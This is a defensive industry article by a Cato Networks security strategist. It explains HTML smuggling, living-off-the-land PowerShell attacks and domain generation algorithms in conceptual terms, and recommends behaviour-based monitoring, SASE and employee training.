As cybercriminals become more resourceful, traditional security solutions face mounting challenges. Attackers have developed highly sophisticated methods to bypass detection systems and infiltrate networks, leaving businesses vulnerable to silent, undetected breaches.
These methods, known as evasion tactics, exploit weaknesses in conventional security systems, allowing hackers to operate within company networks for extended periods without detection. With increased cyber threats, it’s crucial to understand how these tactics work and how organisations can protect themselves from these invisible threats.
Three of the most effective and increasingly common evasion techniques, HTML smuggling, Living-off-the-Land (LotL) attacks, and the use of domain generation algorithms (DGA), have emerged as significant threats. Understanding these methods and the strategies for defending against them is crucial for maintaining robust security in the face of evolving cyber risks.
The rise of HTML smuggling into seemingly harmless files or emails
HTML smuggling has emerged as one of the more dangerous forms of attack in recent years due to its ability to bypass traditional security defences. This method involves embedding malicious code, often JavaScript, into seemingly innocent HTML files or email attachments. The malicious payload is delivered to users under the guise of a legitimate file or email, tricking them into unknowingly executing the harmful code.
An example of this technique is when attackers send HTML files as email attachments that contain hidden JavaScript. When the recipient opens the file, the script runs in the background, often generating a phishing page designed to capture sensitive information such as login credentials. What makes HTML smuggling particularly dangerous is that the malicious code is executed within the user’s browser, bypassing email filters, antivirus programs, and even network firewalls.
Consider a scenario where an employee receives an email that appears to be from a trusted source, with an attachment labelled as an invoice or report. Upon opening the file, they are redirected to a fake login page for a popular online service, such as Microsoft 365 or Google. Because the page looks legitimate, the employee might unknowingly enter their login details, which are immediately transmitted to the attackers.
This approach highlights one of the most concerning aspects of HTML smuggling: it exploits human trust. Attackers disguise their payloads in a manner that convinces the user the content is safe, thus bypassing traditional security measures. In this way, HTML smuggling not only exploits the limitations of current security technologies but also preys on the human element of cybersecurity. To mitigate this risk, organisations must implement more sophisticated email filtering systems and ensure that employees are educated about the dangers of opening unexpected or suspicious attachments.
How attackers use LotL techniques to execute malware
LotL techniques represent another growing threat in the world of cyberattacks. Unlike traditional malware that relies on external software or payloads to breach a network, LotL attacks make use of legitimate system tools and processes already present in the target environment. By leveraging trusted applications and utilities, attackers can hide their activities, making them harder to detect by conventional security systems.
One of the most commonly exploited tools in LotL attacks is PowerShell, a legitimate command-line shell and scripting language native to Windows systems. PowerShell allows administrators to automate tasks and manage systems, but it can also be exploited by attackers to execute malicious scripts and download malware. Because PowerShell is a trusted system tool, many antivirus programs and intrusion detection systems (IDS) overlook its usage, especially if the commands appear to be part of normal operations.
For example, an attacker may send a phishing email that contains a malicious link. When the recipient clicks the link, a PowerShell script is executed in the background, downloading malware from a remote server and installing it on the victim’s system. Since no external files are involved, the attack goes undetected by signature-based detection systems that rely on identifying known malware files. Additionally, many LotL attacks leave no traces on the hard drive, operating entirely in system memory, making forensic analysis difficult.
The effectiveness of LotL attacks lies in their ability to blend in with regular system activities, reducing their chances of detection. To defend against these attacks, businesses should consider implementing behaviour-based detection systems that can monitor how system tools are being used. By identifying unusual or suspicious activity, such as the unexpected use of PowerShell commands or network traffic to suspicious domains, organisations can catch these attacks before they cause significant damage.
Why DGAs bypass IDS and IPS
DGAs represent another sophisticated technique used by cybercriminals to evade detection. DGA-based attacks are particularly effective at avoiding traditional Intrusion Detection Systems (IDS) and Intrusion Prevention Systems (IPS) because they dynamically generate a large number of domain names, making it difficult to block malicious communications.
DGAs work by creating a seemingly random set of domain names that a piece of malware can use to communicate with its command-and-control (C2) server. These domain names can be generated daily, hourly, or even by the minute, allowing the malware to cycle through a list of domains until it successfully connects with the C2 server. Because the domains are constantly changing, it becomes nearly impossible for security teams to block them all in real-time.
In a typical DGA-based attack, the malware might generate hundreds or even thousands of potential domain names in an attempt to contact its C2 server. This not only overwhelms security systems but also makes it difficult to distinguish between legitimate and malicious traffic. Even if security teams identify and block one domain, the malware can quickly switch to another domain generated by the algorithm.
Additionally, attackers often register only a small subset of these generated domains, making it even harder to predict which domain the malware will use for communication. This dynamic nature allows attackers to maintain control over their malware while evading detection by standard security measures like IDS and IPS.
To combat DGA-based attacks, organisations need to employ advanced threat intelligence solutions that can detect patterns in domain generation and identify malicious domains before they are activated. Machine learning algorithms are particularly effective in analysing network traffic to identify unusual domain activity, providing an additional layer of defence against these evasive techniques.
How can organisations respond to attacks with evasion tactics
Advanced security measures that go beyond conventional solutions are required to better protect companies against the attack methods. Traditional malware scanners and IDS systems are reaching their limits as they mainly rely on signature-based detection and are often unable to identify the dynamic and obfuscated attacks. Instead, companies should rely on agentless systems that monitor and analyse all network traffic in real time.
Agentless systems offer the advantage that they do not require additional software agents on end devices, which reduces system performance and simplifies administration. By continuously monitoring network traffic, these systems can detect suspicious activity and anomalies that indicate potential threats. For example, a sudden communication with a large number of newly registered domains, as occurs in DGA-based attacks, can be immediately identified and blocked.
Behaviour-based analytics play a critical role in HTML smuggling and fileless malware that evade traditional detection methods. Agentless systems can detect conspicuous behaviour patterns, such as unusual PowerShell activity or the loading of HTML files containing JavaScript code and take appropriate action before damage occurs. By detecting anomalies in network traffic, slow-and-low attacks that specifically bypass IDS systems can also be identified at an early stage.
Homograph attacks and HTTPS-encrypted phishing pages require in-depth URL and content analysis. Agentless systems detect subtle differences in URLs and analyse encrypted traffic to expose phishing sites despite encryption. By combining these techniques, organisations can build a robust line of defence against the diverse and increasingly sophisticated threats.
Staying ahead of attackers
Evasion tactics, such as HTML smuggling, LotL techniques, and DGAs, represent some of the most dangerous threats in today’s cybersecurity landscape. These methods allow attackers to bypass traditional security defences, making it increasingly difficult for organisations to detect and respond to cyberattacks in a timely manner.
As cybercriminals continue to refine their methods, it is crucial for businesses to adopt more advanced security strategies. Relying solely on signature-based detection systems or traditional firewalls is no longer sufficient. Instead, organisations must invest in behaviour-based analysis, machine learning technologies, and advanced threat intelligence solutions that can detect anomalies in system activity and network traffic.
Adopting a Secure Access Service Edge (SASE) framework can help organisations to secure their network and infrastructure. By integrating these functions, SASE provides comprehensive protection that adapts to attackers’ evolving tactics, making it a strong choice for organisations looking to reduce risks associated with advanced evasion techniques.
Additionally, employee training remains a critical component of any cybersecurity strategy. Since many evasion tactics, such as HTML smuggling, exploit human trust, educating employees about the dangers of phishing emails and suspicious attachments can significantly reduce the risk of successful attacks.
Staying ahead of attackers demands a multi-layered security approach. By understanding the tactics employed by cybercriminals and strengthening defences, businesses can enhance their protection against the increasing threat of evasion techniques.
Etay Maor
Etay Maor is Chief Security Strategist at Cato Networks.
